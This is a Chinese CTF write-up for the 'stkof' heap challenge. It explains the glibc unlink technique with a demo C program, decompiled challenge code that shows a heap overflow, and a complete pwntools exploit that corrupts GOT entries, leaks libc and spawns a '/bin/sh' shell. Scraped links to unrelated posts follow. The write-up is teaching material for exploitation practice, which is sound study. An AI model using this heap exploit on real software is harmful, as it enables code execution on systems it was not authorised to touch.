stkof 程序下载:https://pan.baidu.com/s/1_dcm8OFjhKbKYWa3WBtAiQ

提取码:pkyb

unlink 基础操作

# define unlink
#define unlink(AV, P, BK, FD) {                                             \
FD = P->fd; \
BK = P->bk; \
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
malloc_printerr (check_action, "corrupted double-linked list", P, AV);\
else { \
FD->bk = BK; \
BK->fd = FD; \
...
}

根据unlink的定义中, P BK FD 都是chunk .(上述代码中省略部分是 large bin 的,不好做利用,我不会)

unlink.c
#include<stdio.h>
#include<malloc.h>
#include<unistd.h>
#include<string.h>
long list;
int main(){
char *p = malloc(0x80);
char *q = malloc(0x80);
char *r = malloc(0x80); list = p;
printf("%p\n",p); *(long *)p = 0;
*(long *)(p+8) = 0x81;
//让下一个chunk释放时检测到这个从fd开始的假chunk已经被释放了 *(long *)(p+16) = &list - 0x3;//FD
*(long *)(p+24) = &list - 0x2;//BK *(long *)(q-16) = 0x80;
*(long *)(q-8) = 0x90;
//prev_size 为80,0x90 prev_inuser位表示前一个chunk已经被free
free(q);
//触发前向合并,移动指针 q -= priv_size strcpy(list,"aaaaaaaabbbbbbbbcccccccc\x38\x10\x60");
strcpy(list,"dddddddd");
//这两个strcpy是为了向0x601038位置写入'dddddddd'
//利用方式:改got表 hook printf("%p\n",malloc(0));
return 0;
}
$ gcc unlink.c
$./a.out
0xa64010
0xa64020
上述代码分析:
FD = P->fd;  |  FD -> bk == P  |  FD -> bk = BK
BK = P->bk; | BK -> fd == P | BK -> fd = FD
| unlink检查方式 | 断链的操作
---------------------------------------------------------------
prev_size 0 <==(p_chunk)
size 0x91
fd 0 <==p的指针
bk 0x81
&list-3 prev_size <==(FD_chunk)
&list-2 size prve_size <==(BK_chunk)
&list-1 fd size
list=p bk fd 最后一行 p==FD->bk==BK->fd
因为BK -> fd = FD 所以 list = &list-3 注: 新申请的内存也是在这个位置
free后还能被改,,真惨...不好,我好喜欢

好了,如果小白在上述代码分析中停留了3天,我就当你明白了

下面开始实战

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
...
while ( fgets(&buf, 10, stdin) )
{
num = atoi(&buf);
switch(num)
{
case 1: ret = add();
goto LABEL_14;
case 2:ret = edit();
goto LABEL_14;
case 3:ret = del();
goto LABEL_14;
case 4:ret = show();
goto LABEL_14; }
...
} signed __int64 add()
{
...
v4 = __readfsqword(0x28u);
fgets(&s, 16, stdin);
size = atoll(&s);
v2 = (char *)malloc(size);
if ( !v2 )
return -1;
bss_chunkS[++chunk_num] = v2;
printf("%d\n", (unsigned int)chunk_num, size);
return 0LL;
} signed __int64 edit()
{
...
fgets(&buf, 16, stdin);
index = atol(&buf);
if ( index > 0x100000 )
return -1;
if ( !bss_chunkS[index] )
return -1;
fgets(&buf, 16, stdin);
n = atoll(&buf);
ptr = bss_chunkS[index];
for ( i = fread(ptr, 1uLL, n, stdin); i > 0; i = fread(ptr, 1uLL, n, stdin) )// 溢出
{
ptr += i;
n -= i;
}
...
} signed __int64 del()
{
...
fgets(&s, 16, stdin);
index = atol(&s);
if ( index > 0x100000 )
return 0xFFFFFFFFLL;
if ( !bss_chunkS[index] )
return 0xFFFFFFFFLL;
free(bss_chunkS[index]);
bss_str[index] = 0LL;
return 0LL;
} signed __int64 show()
{
...
fgets(&s, 16, stdin);
v1 = atol(&s);
if ( v1 > 0x100000 )
return -1;
if ( !bss_chunkS[v1] )
return 0xFFFFFFFFLL;
if ( strlen(bss_chunkS[v1]) <= 3 )
puts("//TODO");
else
puts("...");
return 0LL;
}
利用代码
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from pwn import *
p = process("./stkof")
elf=ELF('./stkof')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') def add(size):
p.sendline('1')
p.sendline(str(size))
p.recvuntil('OK\n') def edit(index,payload):
p.sendline('2')
p.sendline(str(index))
p.sendline(str(len(payload)))
p.sendline(payload)
p.recvuntil('OK\n') def delete(index):
p.sendline('3')
p.sendline(str(index)) add(0x80) #此时的堆布局 1.printf 2.chunk1
add(0x20) # 3.puts 4.chunk2
add(0x80) # 5.chunk3 6.top_chunk
#我们不好将chunk1直接溢出到chunk2,但chunk2与chunk3是连续的 chunk_list=0x602140+0x10 #第2个chunk的指针 payload = p64(0)
payload += p64(0x21)
payload += p64(chunk_list - 0x18) #FD
payload += p64(chunk_list - 0x10) #BK payload += p64(0x20)
payload += p64(0x90)
edit(2,payload) delete(3) #chunk_list=&chunk_list-0x18 FD
p.recvuntil('OK\n') payload = p64(0)+ p64(elf.got['free'])
payload += p64(elf.got['puts']) + p64(elf.got['atoi'])
edit(2,payload)#idx2 这个位置 = &chunk_list-0x18
#当编辑完后,chunk2这个指针指向 atoi@got payload = p64(elf.plt['puts'])
edit(0, payload) #free@got 改为指向 puts@plt delete(1) #free@got->puts@plt(puts@got)
p.recvline()
puts_addr = u64(p.recvline()[:-1].ljust(8, '\x00'))
system = puts_addr - libc.symbols['puts'] + libc.symbols['system'] edit(2,p64(system)) #atoi@got->system addr
p.sendline('/bin/sh')
p.recvuntil('FAIL\n')
p.interactive()

通过这此的题,我发现自己对malloc free的源码的理解程度严重不足,这题我足足做了3天,我还是闭关研究一下源码吧..

unlink- ctf-stkof的更多相关文章

  1. [CTF]Heap vuln -- unlink

    0x00: 起因 一直在堆的漏洞利用中不得要领,之前ZCTF又是三个堆的利用,血崩,chxx表哥给写了一个heap的pwn,学习学习. 0x01: 关于heap的unlink的漏洞利用,出的很早,在低 ...

  2. linux下堆溢出unlink的一个简单例子及利用

    最近认真学习了下linux下堆的管理及堆溢出利用,做下笔记:作者作为初学者,如果有什么写的不对的地方而您又碰巧看到,欢迎指正. 本文用到的例子下载链接https://github.com/ctfs/w ...

  3. 如何在CTF中当搅屎棍

    论如何在CTF比赛中搅屎 0×00 前言 不能搅屎的CTF不是好CTF,不能搅屎的题目不是好题目. 我很赞成phithon神的一句话,"比赛就是和他人竞争的过程,通过各种手段阻止对手拿分我觉 ...

  4. Unlink——2016 ZCTF note2解析

    简介 Unlink是经典的堆漏洞,刚看到这个漏洞不知道如何实现任意代码执行,所以找了一个CTF题,发现还有一些细节的地方没有讲的很清楚,题目在这里.自己也动手写一遍,体验一下 题目描述 首先,我们先分 ...

  5. CTF中做Linux下漏洞利用的一些心得

    其实不是很爱搞Linux,但是因为CTF必须要接触一些,漏洞利用方面也是因为CTF基本都是linux的pwn题目. 基本的题目分类,我认为就下面这三种,这也是常见的类型. 下面就分类来说说 0x0.栈 ...

  6. ctf经典好题复习

    WEB200-2 这是swpu-ctf的一道题. <?php if(isset($_GET['user'])){ $login = @unserialize(base64_decode($_GE ...

  7. CTF AWD模式攻防Note

    ###0x01 AWD模式 Attack With Defence,简而言之就是你既是一个hacker,又是一个manager.比赛形式:一般就是一个ssh对应一个web服务,然后flag五分钟一轮, ...

  8. CTF辅助脚本

    首先推荐这篇文章,网上有多次转载,这是我见过日期比较早的 CTF中那些脑洞大开的编码和加密 凯撒密码 flag='flag{abcdef}' c='' n=20 for i in flag: if ' ...

  9. CTF基础知识 && AWD红蓝对抗

    AWD 备份源码,修改账户密码,查看是否有预留后门然后删掉 修改mysql密码 格式:mysqladmin -u用户名 -p旧密码 password 新密码 例子:mysqladmin -uroot ...

  10. CTF中的AWD套路

    今年参加了三起CTF比赛,属于初学者,基本除了web其他的不会,但分赛场AWD相对就没什么难度,基本都是技巧性.其中一场进入复赛了,本月底再次比赛(ctf题做的这么渣还能进也是绝了~),参照前人经验补 ...

随机推荐

  1. SQL函数 Convert,dateadd

    1.SQL中CONVERT转化函数的用法 格式:CONVERT(data_type,expression[,style])说明:此样式一般在时间类型(datetime,smalldatetime)与字 ...

  2. GlobalLock锁定一个全局内存对象

    GlobalLock BAIPro

  3. 深入理解JAVA虚拟机 晚期(运行期)优化(转载)

    这一章节的内容实用性不强 所以不再手打笔记 转载了一篇 原文地址是http://blog.csdn.net/qq_27350929/article/details/54837595 在部分的商用虚拟机 ...

  4. Kendo UI for jQuery使用教程:入门指南

    [Kendo UI for jQuery最新试用版下载] Kendo UI目前最新提供Kendo UI for jQuery.Kendo UI for Angular.Kendo UI Support ...

  5. html中checkbox自定义样式(css版本)

    <span class="choose"><input type="checkbox" class="input_check&quo ...

  6. iOS 自定义NavigationBar右侧按钮rightBarButtonItem

    自定义右侧的一个按钮 UIBarButtonItem *myButton = [[UIBarButtonItem alloc] initWithTitle:@"主页" style: ...

  7. react保存用户的输入换行,空格等等

    <div dangerouslySetInnerHTML = {{ __html: '接口返回值' }} />

  8. Java word 内容读取

    1.添加依赖关系(网上好多帖子没有写依赖,害我找半天) <dependency>            <groupId>org.apache.poi</groupId& ...

  9. 19. ClustrixDB 执行计划解读

    EXPLAIN语句用于显示ClustrixDB查询优化器(也称为Sierra)如何执行INSERT.SELECT.UPDATE和DELETE语句.EXPLAIN的输出有三列: Operation - ...

  10. C++ 打印XPS文档

    CoInitializeEx(, COINIT_MULTITHREADED); IXpsOMObjectFactory *xpsFactory; HRESULT hr = CoCreateInstan ...